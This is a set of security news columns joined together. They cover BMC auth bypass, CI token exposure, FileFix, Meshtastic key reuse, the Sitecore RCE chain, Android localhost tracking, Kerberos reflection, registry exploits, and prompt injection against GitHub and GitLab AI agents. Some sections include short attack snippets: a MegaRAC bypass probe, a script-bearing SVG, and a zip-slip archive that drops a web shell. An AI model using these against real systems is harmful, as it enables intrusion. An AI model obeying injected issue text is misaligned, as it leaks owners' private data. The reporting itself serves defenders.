
This Week in Security: MegaOWNed, Store Danger, and FileFix

Earlier this year, I was required to move my server to a different datacenter. The tech that helped handle the logistics suggested I assign one of my public IPs to the server’s Baseboard Management Controller (BMC) port, so I could access the controls there if something went sideways. I passed on the offer, and not only because IPv4 addresses are a scarce commodity these days. No, I’ve never trusted a server’s built-in BMC. For reasons like this MegaOWN of MegaRAC, courtesy of a CVSS 10.0 CVE, under active exploitation in the wild.

This vulnerability was discovered by Eclypsium back in March and it’s a pretty simple authentication bypass, exploited by setting an X-Server-Addr header to the device IP address and adding an extra colon symbol to that string. Send this along inside an HTTP request, and it’s automatically allowed without authentication. This was assigned CVE-2024-54085, and for servers with the BMC accessible from the Internet, it scores that scorching 10.0 CVSS.
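For the curious, probing for this flaw takes only a few lines. Here's a minimal sketch in Python — note that the Redfish endpoint path and the IP addresses are placeholders of my choosing, not details from the advisory:

```python
import requests

# Hypothetical probe for the X-Server-Addr bypass. The header trick --
# device IP plus an extra colon -- is from the advisory; the endpoint
# path and IPs are placeholders.
TARGET = "https://192.0.2.10"          # BMC under test (placeholder)

resp = requests.get(
    f"{TARGET}/redfish/v1/Managers",   # illustrative Redfish endpoint
    headers={"X-Server-Addr": "192.0.2.10:"},  # note the trailing colon
    verify=False,                      # BMCs typically use self-signed certs
    timeout=10,
)
# A 200 with no credentials supplied would suggest a vulnerable BMC.
print(resp.status_code)
```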

We’re talking about this now, because CISA has added this CVE to the official list of vulnerabilities known to be exploited in the wild. And it’s hardly surprising, as this is a near-trivial vulnerability to exploit, and it’s not particularly challenging to find web interfaces for the MegaRAC devices using tools like Shodan and others.

There’s a particularly ugly scenario that’s likely to play out here: embedded malware. This vulnerability could be chained with others, and the OS running on the BMC itself could be permanently modified. It would be very difficult to disinfect and then verify the integrity of one of these embedded systems, short of physically removing and replacing the flash chip. And malware running from this very advantageous position would very nearly have the keys to the kingdom, particularly if the architecture connects the BMC over the PCIe bus, which includes Direct Memory Access.

This brings us to the really bad news. These devices are everywhere. The list of hardware that ships with the MegaRAC Redfish UI includes select units from “AMD, Ampere Computing, ASRock, ARM, Fujitsu, Gigabyte, Huawei, Nvidia, Supermicro, and Qualcomm”. Some of these vendors have released patches. But at this point, any of the vulnerable devices on the Internet, still unpatched, should probably be considered compromised.

Patching Isn’t Enough

To drive the point home that a compromised embedded device is hard to fully disinfect, we have the report from [Max van der Horst] at Disclosing.observer, detailing backdoors discovered in various devices, even after the patch was applied.

These tend to hide in PHP code with innocent-looking filenames, or in an Nginx config. This report covers a scan of Citrix hosts, where 2,491 backdoors were discovered, which is far more than had been previously identified. Installing the patch doesn’t always mitigate the compromise.

VSCode

Many of us have found VSCode to be an outstanding IDE, and the fact that it’s Open Source and cross-platform makes it perfect for programmers around the world. Except for the telemetry, which is built into the official Microsoft builds. It’s Open Source, so the natural reaction from the community is to rebuild the source, and offer builds that don’t have telemetry included. We have fun names like VSCodium and Cursor for these rebuilds. Kudos to Microsoft for making VSCode Open Source so this is possible.

There is, however, a catch, in the form of the extension marketplace. Only official VSCode builds are allowed to pull extensions from the marketplace. As would be expected, the community has risen to the challenge, and one of the marketplace alternatives is Open VSX. And this week, we have the story of how a bug in the Open VSX publishing code could have been a really big problem.

When developers are happy with their work, and are ready to cut a release, how does that actually work? Basically every project uses some degree of automation to make releases happen. For highly automated projects, it’s just a single manual action — a kick-off of a Continuous Integration (CI) run — that builds and publishes the new release. Open VSX supports this sort of approach, and in fact runs a nightly GitHub Action to iterate through the list of extensions, and pull any updates that are advertised.

VS Code extensions are Node.js projects, and are built using npm. So the workflow clones the repository, and runs npm install to generate the installable packages. Running npm install does carry the danger that arbitrary code runs inside the build scripts. How bad would it be for malicious code to run inside this nightly update action, on the Open VSX GitHub repository?
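To make that danger concrete, here’s a small audit sketch (my own illustration, not Open VSX’s actual tooling) that flags the npm lifecycle hooks that run automatically during an install:

```python
import json
import sys

# Lifecycle hooks that npm runs automatically during `npm install`.
RISKY_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def flag_lifecycle_scripts(package_json_path):
    """Print any install-time scripts declared in a package.json."""
    with open(package_json_path) as f:
        manifest = json.load(f)
    for hook, command in manifest.get("scripts", {}).items():
        if hook in RISKY_HOOKS:
            print(f"{package_json_path}: '{hook}' will run: {command}")

if __name__ == "__main__":
    # Usage: python audit.py path/to/package.json [...]
    for path in sys.argv[1:]:
        flag_lifecycle_scripts(path)
```

Any command printed by a script like this runs with the full privileges of the build environment — which is exactly why a nightly CI job doing thousands of `npm install` runs is such a tempting target.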

A super-admin token was available as an environment variable inside this GitHub Action, which, if exfiltrated, would have allowed complete takeover of the Open VSX repository and unfettered access to the software contained therein. There’s no evidence that this vulnerability was found or exploited, and Open VSX and Koi Security worked together to mitigate it, with the patch landing about a month and a half after first disclosure.

FileFix

There’s a new social engineering attack on the web, FileFix. It’s a very simple, nearly dumb idea. By that I mean, a reader of this column would almost certainly never fall for it, because FileFix asks the user to do something really unusual. You get an email or land on a bad website, and it appears to present a document for you. To access this doc, just follow the steps: copy this path, open your File Explorer, and paste the path. Easy! The website even gives you a button to click to launch File Explorer.

That button actually launches a file upload dialog, but that’s not even the clever part. This attack takes advantage of two quirks. The first is that JavaScript can inject arbitrary strings into the paste buffer, and the second is that system commands can be run from the Windows Explorer address bar. So yes, copy that string, paste it into the bar, and it can execute a command. So while it’s a dumb attack, and asks the user to do something very weird, it’s also a very clever intersection between a couple of quirky behaviors, and users will absolutely fall for this.

eMMC Data Extraction

The embedded MultiMediaCard (eMMC) is a popular option for flash storage on embedded devices. And Zero Day Initiative has a fascinating look into what it takes to pull data from an eMMC chip in-situ. An 8-leg EEPROM is pretty simple to desolder or probe, but the ball grid array of an eMMC is beyond the reach of mere mortals. If your soldering skills aren’t up to the task, there’s still hope to get that data off. The only connections needed are power, reference voltage, clock, a command line, and the data lines. If you can figure out connection points for all of those, you can probably power the chip and talk to it.

One challenge is how to keep the rest of the system from booting up and getting chatty. There’s a clever idea: look for a reset pin on the MCU, and just hold that active while you work, keeping the MCU in a reset, and quiet, state. Another fun idea is to just remove the system’s oscillator, as the MCU may depend on it to boot and do anything at all.

Bits and Bytes

What would you do with 40,000 alarm clocks? That’s the question unintentionally faced by [Ian Kilgore], when he discovered that the Loftie wireless alarm clock works over unsecured MQTT. On the plus side, he got home automation integration working.

What does it look like when an attack gets launched against a big cloud vendor? The folks at Cloud-IAM pull the curtain back just a bit, and talk about an issue that almost allowed an enumeration attack to become an effective DDoS. They found the attack and patched their code, at which point it turned into a DDoS race that Cloud-IAM managed to win.

The Wire secure communication platform recently got a good hard look from the Almond security team. And while the platform seems to have passed with good grades, there are a few quirks around file sharing that you might want to keep in mind. For instance, when a shared file is deleted, the backing files aren’t deleted, just the encryption keys. And the UUID on those files serves as the authentication mechanism, with no additional authentication needed. None of the issues found rise to the level of vulnerabilities, but it’s good to know.

And finally, Control Web Panel (formerly CentOS Web Panel) has a pair of vulnerabilities that allowed running arbitrary commands prior to authentication. The flaws have been fixed in version 0.9.8.1205, but are trivial enough that this cPanel alternative needs to get patched on systems right away.

This Week in Security: That Time I Caused a 9.5 CVE, iOS Spyware, and The Day the Internet Went Down

Meshtastic just released an eye-watering 9.5 CVSS CVE, warning about public/private keys being re-used among devices. And I’m the one that wrote the code. Not to mention, I triaged and fixed it. And I’m part of Meshtastic Solutions, the company associated with the project. This is the story of how we got here, and a bit of perspective.

First things first, what kind of keys are we talking about, and what does Meshtastic use them for? These are X25519 keys, used specifically for encrypting and authenticating Direct Messages (DMs), as well as optionally for authorizing remote administration actions. It is, by the way, this remote administration scenario using a compromised key that leads to such a high CVSS rating. Before version 2.5 of Meshtastic, the only cryptography in place was simple AES-CTR encryption using shared symmetric keys, still in use for multi-user channels. The problem was that DMs were also encrypted with this channel key, and just sent with the “to” field populated. Anyone with the channel key could read the DM.

I re-worked an old pull request that generated X25519 keys on boot, using the rweather/crypto library. That sentence highlights two separate problems, both of which can lead to unintentional key re-use. First, the keys are generated at first boot. I was made painfully aware that this was a weakness when a user sent an email to the project, warning us that he had purchased two devices, and they had matching keys out of the box. When the vendor manufactured this device, they flashed Meshtastic on one unit, let it boot up once, and then used a debugger to copy off a “golden image” of the flash. Then every other device in that particular manufacturing run was flashed with this golden image — containing the same private key. Sigh.

There’s a second possible cause for duplicated keys, discovered while triaging the golden image issue. On the Arduino platform, it’s reasonably common to use the random() function to generate a pseudo-random value, and the Meshtastic firmware is careful to manage the random seed and the random() function so it produces properly unpredictable values. The crypto library is solid code, but it doesn’t call random(). On ESP32 targets, it does call the esp_random() function, but on a target like the NRF52, there isn’t a call to any hardware randomness sources. This puts such a device in the precarious position of relying on a call to micros() for its randomness source. While non-ideal, this is made disastrous by the fact that the randomness pool is being called automatically on first boot, leading to significantly lower entropy in the generated keys.

Release 2.6.11 of the Meshtastic firmware fixes both of these issues. First, by delaying key generation until the user selects the LoRa region. This makes it much harder for vendors to accidentally ship devices with duplicated keys. It gives users an easy way to check: just make sure the private key is blank when you receive the device. And since the device is waiting for the user to set the region, the micros() clock is a much better source of randomness. And second, by mixing in the results of random() and the burnt-in hardware ID, we ensure that the crypto library’s randomness pool is seeded with some unique, unpredictable values.
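Conceptually, the seeding fix looks something like the Python sketch below. This is strictly an illustration of the mixing idea — the real firmware is C++ and feeds the crypto library’s own randomness pool:

```python
import hashlib
import os
import time

def seed_material(hardware_id: bytes, boot_micros: int, prng_bytes: bytes) -> bytes:
    """Mix several independent sources so no single weak one dominates.

    A conceptual analogue of the firmware fix -- the real code is C++
    and feeds the crypto library's pool rather than returning a digest.
    """
    h = hashlib.sha256()
    h.update(hardware_id)                        # burnt-in unique ID
    h.update(boot_micros.to_bytes(8, "little"))  # clock at key-generation time
    h.update(prng_bytes)                         # platform random() output
    return h.digest()

# Placeholder inputs standing in for the device's real sources.
seed = seed_material(os.urandom(8), time.monotonic_ns() // 1000, os.urandom(16))
```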

The reality is that IoT devices without dedicated cryptography chips will always struggle to produce high quality randomness. If you really need secure Meshtastic keys, you should generate them on a platform with better randomness guarantees. The openssl binary on a modern Linux or Mac machine would be a decent choice, and the Meshtastic private key can be generated using openssl genpkey -algorithm x25519 -outform DER | tail -c32 | base64.
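If you’d rather do that in code than on the command line, a rough equivalent using Python’s cryptography package (an assumption on my part — any library that exposes raw X25519 keys will do) looks like this:

```python
import base64
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

# Generate an X25519 key from the OS randomness pool, then emit the
# 32 raw private-key bytes as base64 -- the same output shape as the
# openssl pipeline above.
private_key = X25519PrivateKey.generate()
raw = private_key.private_bytes(
    encoding=serialization.Encoding.Raw,
    format=serialization.PrivateFormat.Raw,
    encryption_algorithm=serialization.NoEncryption(),
)
print(base64.b64encode(raw).decode())
```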

What’s Up with SVGs?

You may have tried to share a Scalable Vector Graphics (SVG) file on a platform like Discord, and been surprised to see an obtuse text document rather than your snazzy logo. Browsers can display SVGs, so why do many web platforms refuse to render them? I’ve quipped that it’s because SVGs are Turing complete, which is almost literally true. But in reality it’s because SVGs can include inline HTML and JavaScript. IBM’s X-Force has the inside scoop on the use of SVG files in phishing campaigns. The key here is that JavaScript and data inside an SVG can often go undetected by security solutions.
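It takes surprisingly little to turn an “image” into a script host. This sketch writes a perfectly valid SVG that pops an alert when opened directly in a browser — real phishing payloads are, of course, far more obfuscated:

```python
# A valid SVG that executes JavaScript when opened directly in a
# browser -- which is exactly why platforms treat SVGs as documents,
# not images.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="tomato"/>
  <script>alert('script running inside an image');</script>
</svg>
"""

with open("innocent-logo.svg", "w") as f:
    f.write(MALICIOUS_SVG)
```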

The attack chain that X-Force highlights is convoluted, with the SVG containing a link offering a PDF download. Clicking this actually downloads a ZIP containing a JS file, which when run, downloads and attempts to execute a JAR file. This may seem ridiculous, but it’s all intended to defeat a somewhat sophisticated corporate security system, so an inattentive user will click through all the files in order to get the day’s work done. And apparently this tactic works.

*OS Spyware

Apple published updates to its entire line back in February, fixing a pair of vulnerabilities that were being used in sophisticated targeted attacks. CVE-2025-43200 was “a logic issue” that could be exploited by malicious images or videos sent in iCloud links. CVE-2025-24200 was a flaw in USB Restricted Mode, that allowed that mode to be disabled with physical access to a device.

What’s newsworthy about these vulnerabilities is that Citizen Lab has published a report that CVE-2025-43200 was used in a 0-day exploitation of journalists by the Paragon Graphite spyware. It is slightly odd that Apple credits the other fixed vulnerability, CVE-2025-24200, to Bill Marczak, a Citizen Lab researcher and co-author of this report. Perhaps there is another shoe yet to drop.

Regardless, iOS infections have been found on the phones of two separate European journalists, with a third confirmed targeted. It’s unclear which customer contracted Paragon to spy on these journalists, or what the impetus was for doing so. Companies like Paragon, NSO Group, and others operate within a legal grey area, taking actions that would normally be criminal, but under the authority of governments.

A for Anonymous, B for Backdoor

WatchTowr has a less-snarky-than-usual treatment of a chain of problems in the Sitecore Experience Platform that takes an unauthenticated attacker all the way to Remote Code Execution (RCE). The initial issue here is the pre-configured user accounts, like default\Anonymous, used to represent unauthenticated users, and sitecore\ServicesAPI, used for internal actions. Those special accounts do have password hashes. Surely there isn’t some insanely weak password set for one of those users, right? Right? The password for ServicesAPI is b.

ServicesAPI is interesting, but trying the easy approach of just logging in with that user on the web interface fails with a unique error message: this user does not have access to the system. Someone knew this could be a problem, and added logic to prevent this user from being used for general system access, by checking which database the current handler is attached to. Is there an endpoint that connects to a different database? Naturally. Here it’s the administrative web login, which has no database attached. The ServicesAPI user can log in there! The good news is that it can’t do anything, as this user isn’t an admin. But the login does work, and does result in a valid session cookie, which does allow for other actions.

There are several approaches the WatchTowr researchers tried in order to get RCE from the user account. They narrowed in on a file upload action that was available to them, noting that they could upload a zip file, and it would be automatically extracted. There were no checks for path traversal, so it seems like an easy win. Except Sitecore doesn’t necessarily have a standard install location, so this approach has to guess at the right path traversal steps to use. The key is that there is just a little bit of filename mangling that can be induced, where a backslash gets replaced with an underscore. This allows a /\/ in the path traversal path to become /_/, a special sequence that represents the webroot directory. And we have RCE. These vulnerabilities have been patched, but more were discovered in this research that are still to be revealed.
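The generic version of that upload trick is often called “zip slip”, and it’s trivially easy to build such an archive. A sketch, with a guessed destination path rather than Sitecore’s real one:

```python
import zipfile

# "Zip slip" in a nutshell: archive entry names are attacker-controlled
# strings, and nothing stops them from containing traversal sequences.
# The destination path is a guess -- as noted above, the real attack
# had to guess Sitecore's install location too.
with zipfile.ZipFile("payload.zip", "w") as zf:
    zf.writestr(
        "../../../inetpub/wwwroot/shell.aspx",   # hypothetical traversal path
        "<%-- attacker-controlled content --%>",
    )
```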

The Day the Internet Went Down

OK, that may be overselling it just a little bit. But Google Cloud had an eight-hour event on the 12th, and the repercussions were wide, including taking down parts of Cloudflare for a portion of that time.

Google’s downtime was caused by bad code that was pushed to production with insufficient testing, and that lacked error handling. It was intended to implement a quota policy check. A separate policy change was rolled out globally, and it had unintended blank fields. These blank fields hit the new code, and triggered null pointer dereferences all around the globe at once. An emergency fix was deployed within an hour, but the problem was large enough to have quite a long tail.

Cloudflare’s issue was connected to their Workers KV service, a key-value store that is used in many of Cloudflare’s other products. Workers KV is intended to be “coreless”, meaning a cascading failure should be impossible. The reality is that Workers KV still uses a third-party service as the bootstrap for that live data, and Google Cloud is part of that core. When Google’s cloud started having problems, so did Cloudflare, and much of the rest of the Internet.

I can’t help but worry just a bit about the possible scenario where Google relies on an outside service that itself relies on Cloudflare. In the realm of the power grid, we sometimes hear about the cold start scenario, where everything is powered down. It seems like there is a real danger of a cold start scenario for the Internet, where multiple giant interdependent cloud vendors are all down at the same time.

Bits and Bytes

Fault injection is still an interesting research topic, particularly for embedded targets. [Maurizio Agazzini] from HN Security is doing work on voltage injection against an ESP32 V3 target, with the aim of coercing the processor to jump over an instruction and interpret a CRC32 code as an instruction pointer. It’s not easy, but he managed a 1.5% success rate at bypassing secure boot with the voltage injection approach.

Intentional jitter is used in many exploitation tools, as a way to disguise what might otherwise be tell-tale traffic patterns. But Varonis Threat Labs has produced Jitter-Trap, a tool that looks for the jitter, and attempts to identify the exploitation framework in use from the timing information.

We’ve talked a few times about vibe researching, but [Craig Young] is only dipping his toes in here. He used an LLM to find a published vulnerability, and then analyzed it himself. Turns out that the GIMP despeckle plugin doesn’t do bounds checking for very large images. Then back to an LLM, to get a Python script to generate such a file. It does indeed crash GIMP when trying to despeckle, confirming the vulnerability report, and demonstrating that there really are good ways to use LLMs while doing security research.

FLOSS Weekly Episode 837: World’s Best Beta Tester

This week Jonathan chats with Geekwife! What does a normal user really think of Linux on the desktop and Open Source options? And what is it really like, putting up with Jonathan’s shenanigans? Watch to find out!

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

This Week in Security: The Localhost Bypass, Reflections, and X

Facebook and Yandex have been caught performing user-hostile tracking. This sort of makes today just another Friday, but this is a bit special. This time, it’s Local Mess. OK, it’s an attack with a dorky name, but very clever. The short explanation is that web sites can open connections to localhost. And on Android, apps can be listening to those ports, allowing web pages to talk to apps.

That may not sound too terrible, but there are a couple of things to be aware of. First, Android (and iOS) apps are sandboxed — intentionally making it difficult for one app to talk to another, except in ways approved by the OS maker. The browser is similarly sandboxed away from the apps. This is a security boundary, and it’s an especially important one when the user is in incognito mode.

The tracking pixel is important to explain here. This is a snippet of code that puts an invisible image on a website, and as a result allows the tracker to run JavaScript in your browser in the context of that site. Facebook is famous for this, but it is not the only advertising service that tracks users in this way. If you’ve searched for an item on one site, and then suddenly been bombarded with ads for that item on other sites, you’ve been tracked by the pixel.

This is most useful when a user is logged in, but on a mobile device, the user is much more likely to be logged in on an app and not the browser. The constant pressure for more and better data led to a novel and completely unethical solution. On Android, applications with permission to access the Internet can listen on localhost (127.0.0.1) on unprivileged ports, those above 1024.
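The quirk itself is easy to reproduce. Any app with the Internet permission can do the moral equivalent of this sketch, binding a localhost port and waiting for a browser on the same device to connect:

```python
import socket

# Bind an unprivileged localhost port and wait for a browser on the
# same device to connect -- no special permission needed beyond
# ordinary Internet access. Port number is arbitrary.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 12387))
server.listen(1)

conn, addr = server.accept()
data = conn.recv(4096)          # whatever the web page sent our way
print(f"received {len(data)} bytes from {addr}")
conn.close()
```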

Facebook abused this quirk by opening a WebRTC connection to localhost, to one of the ports the Facebook app was listening on. This triggers an SDP connection to localhost, which starts by sending a STUN packet, a UDP tool for NAT traversal. Packed into that STUN packet is the contents of a Facebook cookie, which the Facebook app happily forwards up to Facebook. The browser also sends that cookie to Facebook when loading the pixel, and boom, Facebook knows what website you’re on. Even if you’re not logged in, or incognito mode is turned on.

Yandex has been doing something similar since 2017, though with a different, simpler mechanism. Rather than call localhost directly, Yandex just sets aside yandexmetrica.com for this purpose, with the domain pointing to 127.0.0.1. This was just used to open an HTTP connection to the native Yandex apps, which passed the data up to Yandex over HTTPS. Meta apps were first seen using this trick in September 2024, though it’s very possible it was in use earlier.

Both companies have ceased this tracking since the report was released. What’s interesting is that this is a flagrant violation of GDPR and CCPA, and will likely lead to record-setting fines, at least for Facebook.

What’s your Number?

An experiment in seeing which Google sites still worked with JavaScript disabled led to a fun discovery about how to sidestep rate limiting and find any Google user’s phone number. Google has deployed defensive solutions to prevent attackers from abusing endpoints like accounts.google.com/signin/usernamerecovery. That particular endpoint still works without JS, but it also still detects more than a few attempts, and throws a captcha at anyone trying to brute-force it.

This is intended to work by JS in your browser performing a minor proof-of-work calculation and then sending in a bgRequest token. On the no-JavaScript version of the site, that field was instead set to js_disabled. What happens if you simply take a valid token from the JS-enabled flow and stuff it into the no-JS request? Profit! This unintended combination bypassed rate-limiting, meaning a phone number was trivially discoverable from just a user’s first and last names. It was mitigated in just over a month, and [brutecat] earned a nice $5,000 for the effort.

Catching Reflections

There’s a classic Active Directory attack, the reflection attack, where you trick a server into sending you authentication data, and then deliver that data directly back to the origin server. Back before 2008, this actually worked on AD servers. The crew at RedTeam Pentesting brought this attack back, this time using Kerberos.

It’s not a trivial attack, and just forcing a remote server to open an SMB connection to a location the attacker controls is an impressive vulnerability. The trick is a hostname that includes the target name and a base64-encoded CREDENTIAL_TARGET_INFORMATIONW structure, all inside the attacker’s valid hostname. This confuses the remote machine, triggering it to act as if it’s authenticating to itself. Forcing a Kerberos authentication instead of NTLM completes the attacker magic, though there’s one more mystery at play.

When the attack starts, the attacker has a low-privileged computer account. When it finishes, the access is at SYSTEM level on the target. It’s unclear exactly why, though the researchers theorize that a mitigation intended to prevent almost exactly this privilege escalation is the cause.

X And the Juicebox

X has rolled out a new end-to-end encrypted chat solution, XChat. It’s intended to be a significant upgrade from the previous iteration, but not everyone is impressed. True end-to-end encryption is extremely hard to roll out at scale, among other reasons because users are terrible at managing cryptography keys. The solution generally is for the service provider to store the keys instead. But what is the point of end-to-end encryption when the company holds the keys? While there isn’t a complete solution for this problem, there is a very clever mitigation: Juicebox.

Juicebox lets users set a short PIN, uses that in the generation of the actual encryption key, breaks the key into parts to be held at different servers, and then promises to erase the key if the PIN is guessed incorrectly too many times. This is the solution X is using. Sounds great, right? There are two gotchas in that description. The first is the different servers: that’s only useful if those servers aren’t all run by the same company. And second, the promise to delete the key. That’s not cryptographically guaranteed.
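Conceptually the scheme looks something like the sketch below — a toy illustration of the PIN-stretching and key-splitting steps, not Juicebox’s actual protocol. Note that real Juicebox uses a threshold scheme so only a quorum of servers is needed; the XOR split here requires all shares, just to keep the example short:

```python
import hashlib
import os
import secrets

def pin_to_key(pin: str, salt: bytes) -> bytes:
    """Stretch a short PIN into a 32-byte key with a memory-hard KDF."""
    return hashlib.scrypt(pin.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)

def split_key(key: bytes, shares: int = 3) -> list[bytes]:
    """XOR-split the key so that all shares are needed to rebuild it."""
    parts = [secrets.token_bytes(len(key)) for _ in range(shares - 1)]
    last = key
    for p in parts:
        last = bytes(a ^ b for a, b in zip(last, p))
    return parts + [last]

salt = os.urandom(16)
key = pin_to_key("4821", salt)   # a weak PIN becomes a full-size key
shares = split_key(key)          # one share per server/realm
assert key == bytes(a ^ b ^ c for a, b, c in zip(*shares))
```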

There is some indication that X is running a pair of Hardware Security Modules (HSMs) as part of their Juicebox system, which significantly helps with both of those issues, but there just isn’t enough transparency into the system yet. For the time being, the consensus is that Signal is still the safest platform to use.

Bits and Bytes

We’re a bit light on Bits this week, so you’ll have to get by with the report that Secure Boot attacks are publicly available. It’s a firmware update tool from DT Research, signed with Microsoft’s UEFI keys. This tool contains a vulnerability that allows breaking out of its intended use, and running arbitrary code. This one has been patched, but there’s a second, similar problem in a Microsoft-signed IGEL kernel image, which allows running an arbitrary rootfs. This isn’t particularly a problem for us regular users, but the constant stream of compromised, signed UEFI boot images doesn’t bode well for the long-term success of Secure Boot as a security measure.

This Week in Security: CIA Star Wars, Git* Prompt Injection and More

The CIA ran a series of web sites in the 2000s. Most of them were about news, finance, and other relatively boring topics, and they spanned 29 languages. And they all had a bit of a hidden feature: those normal-looking websites had a secret login and hosted CIA covert communications with assets in foreign countries. A password typed into a search field on each site would trigger a Java applet or Flash application, allowing the spy to report back. This isn’t exactly breaking news, but what’s captured the Internet’s imagination this week is the report by [Ciro Santilli] about how to find those sites, and the fact that a Star Wars fansite was part of the network.

This particular CIA tool was intended for short-term use, and was apparently so effective that it was dragged way beyond its intended lifespan, right up to the point it was discovered and started getting people killed. And in retrospect, the tradecraft is abysmal. The sites were hosted on a small handful of IP blocks, with the individual domains hosted on sequential IP addresses. Once one foreign intelligence agency discovered one of these sites, the rest were fairly easily identified.

This report is about going back in time using the Wayback Machine and other tools, and determining how many of these covert sites can be discovered today. And then documenting how it was done and what the results were. Surprisingly, some of the best sources for this effort were domain name data sets. Two simple checks to narrow down the possible targets were checking for IPs hosting only one domain, and for the word “news” as part of the domain name. From there, it’s the tedious task of looking at the Wayback Machine’s archives, trying to find concrete hits. Once a site was found on a new IP block, the whole block could be examined using historic DNS data, and hopefully more of the sites discovered.
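Given a historic DNS dataset, that first-pass filter is only a few lines of code. A sketch, assuming rows of (domain, ip) pairs — the hard part is obtaining the dataset, not the filtering:

```python
from collections import defaultdict

def candidate_domains(records):
    """Yield (domain, ip) pairs matching the write-up's first-pass filter:
    IPs hosting exactly one domain, where the name contains 'news'."""
    by_ip = defaultdict(set)
    for domain, ip in records:
        by_ip[ip].add(domain)
    for ip, domains in by_ip.items():
        if len(domains) == 1:
            (domain,) = domains
            if "news" in domain:
                yield domain, ip

# Hypothetical dataset rows -- real datasets have billions of entries.
sample = [("example-shop.com", "198.51.100.7"), ("world-news-daily.net", "198.51.100.8")]
print(list(candidate_domains(sample)))
```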

So far, that list is 472 domains. Citizen Lab ran a report on this covert operation back in 2022, and found 885 domains, but opted not to publish the list or details of how they were found. The effort is still ongoing, and if you have any ideas how to find these sites, there’s a chance to help.

Profiling Internet Background Radiation

You may have noticed that as soon as you put a host on a new IP address on the Internet, it immediately starts receiving traffic. The creative term that refers to all of this is Internet Background Radiation. It’s composed of TCP probes, reflections from spoofed UDP attacks, and lots of other weird traffic. Researchers at Netscout decided to look at just one element of that radiation, TCP SYN packets — the unsolicited first packet of a TCP handshake. What secrets would this data contain?

The first intriguing statistic is the number of spoofed TCP SYN packets coming from known bogus source IPs: zero. This isn’t actually terribly surprising, for a couple of reasons. One, packets originating from impossible addresses are rather easy to catch and drop, and many ISPs do this sort of scrubbing at their network borders. But the second reason is that TCP requires a three-way handshake to make a useful connection. And while it’s possible to spoof an IP address on a local network via ARP poisoning, doing so on the open Internet is much more difficult.

Packet TTL is interesting, but the values naturally vary, based on the number of hops between the sender and receiver. A few source IPs were observed to vary in reported TTLs, which could indicate devices behind NAT, or even just the variation between different OS network stacks. But looking for suspicious traffic, two metrics really stand out. The TCP header is a minimum of 20 bytes, with additional length used by each additional option specified. Very few systems will naturally send TCP SYN packets with the header length at exactly 20, suggesting that the observed traffic at that length was mostly TCP probes. The other interesting observation is the TCP window size, with 29,200 being a suspicious value observed in a significant percentage of packets, without a good legitimate explanation.
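Both telltales are easy to spot on the wire. A sketch of that kind of filter using scapy — my own illustration of the technique, not Netscout’s methodology:

```python
from scapy.all import TCP, sniff  # pip install scapy; needs root to sniff

def classify(pkt):
    """Flag SYNs showing the two telltales from the Netscout data."""
    if TCP not in pkt:
        return
    tcp = pkt[TCP]
    if tcp.flags != "S":
        return
    if tcp.dataofs * 4 == 20:          # bare header, zero options: likely a probe
        print(f"options-free SYN from {pkt.sprintf('%IP.src%')}")
    if tcp.window == 29200:            # the suspicious window size observed
        print(f"window-29200 SYN from {pkt.sprintf('%IP.src%')}")

sniff(filter="tcp[tcpflags] & tcp-syn != 0", prn=classify, store=False)
```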

Hacking the MCP

GitHub has developed the GitHub MCP Server, a Model Context Protocol server (not, sadly, a Master Control Program), designed to allow AI agents to interact with the GitHub API. Invariant Labs has put together an interesting demo of how letting an agentic AI work with arbitrary issues from the public could be a bad idea.

The short explanation is that a GitHub issue can include a prompt injection attack. In the example, it looks rather benign, asking for more information about the project author to be added to the project README. Just a few careful details in that issue, like specifying that the author isn’t concerned about privacy, and that the readme update should link to all the user’s other repos. If the repo owner lets an agentic AI loose on the repo via MCP, it’s very likely to leak details and private repo information that it really shouldn’t.

Invariant Labs suggests that MCP servers will need granular controls, limiting what an AI agent can access. I suspect we’ll eventually see a system for new issues like GitHub already has for Pull Requests, where a project maintainer has to approve the PR before any of the automated GitHub Actions are performed on it. Once AI is a normal part of dealing with issues, there will need to be tools to keep the AI from interacting with new issues until a maintainer has cleared them.

GitLab Too

GitLab has their own AI integration, GitLab Duo. Like many AI things, it has the potential to be helpful, and the potential to be a problem. Researchers at Legit Security included some nasty tricks in this work, like hiding prompt injection as hex code, and coloring it white to be invisible on the white GitLab background. Prompt injections could then ask the AI to recommend malicious code, include raw HTML in the output, or even leak details from private repos.

GitLab took the report seriously, and has added additional filtering that prevents Duo from injecting raw HTML into its output. The prompt injection has also been addressed, but the details of how are not fully available.

Finally, Actually Hacking the Registry

We’ve been following Google’s Project Zero and [Mateusz Jurczyk] for quite a while, on a deep dive into the Windows Registry. We’re finally at the point where we’re talking about vulnerabilities. The Windows registry is self-healing, which could be an attack surface on its own, but it definitely provides a challenge to anyone looking for vulnerabilities with a fuzzer, as triggering a crash is very difficult.

But as the registry has evolved over time and across Windows releases, the original security assumptions may not be valid any longer. For instance, in its original form, the registry was only writable by a system administrator. But on modern Windows machines, application hives allow unprivileged users and processes to load their own registry data into the system registry. Registry virtualization and layered keys further complicate the registry structure and code, and with complexity often comes vulnerabilities.

An exploit primitive that turned out to be useful was the out-of-bounds cell index, where one cell can refer to another. This includes a byte offset value, and when the cell being referred to is a “small dir”, this offset can point past the end of the allocated memory.

There were a whopping 17 memory corruption vulnerabilities discovered, but to produce a working exploit, the write-up uses CVE-2023-23420, a use-after-free that can be triggered by performing an in-place rename of a key, followed by deleting a subkey. This can result in a live reference to that non-existent subkey, and thus access to freed memory.

In that freed memory, a fake key is constructed. As the entire data structure is now under the arbitrary control of the attacker, the memory can point anywhere in the hive. This can be combined with the out-of-bounds cell index to manipulate kernel memory. The story turns into a security researcher flex here, as [Mateusz] opted to use a couple of registry keys rigged in this way to make a working kernel memory debugger, accessible from regedit. One key sets the memory address to inspect, and the other key exposes said memory as a writable key. Becoming SYSTEM at this point is trivial.

Bits and Bytes

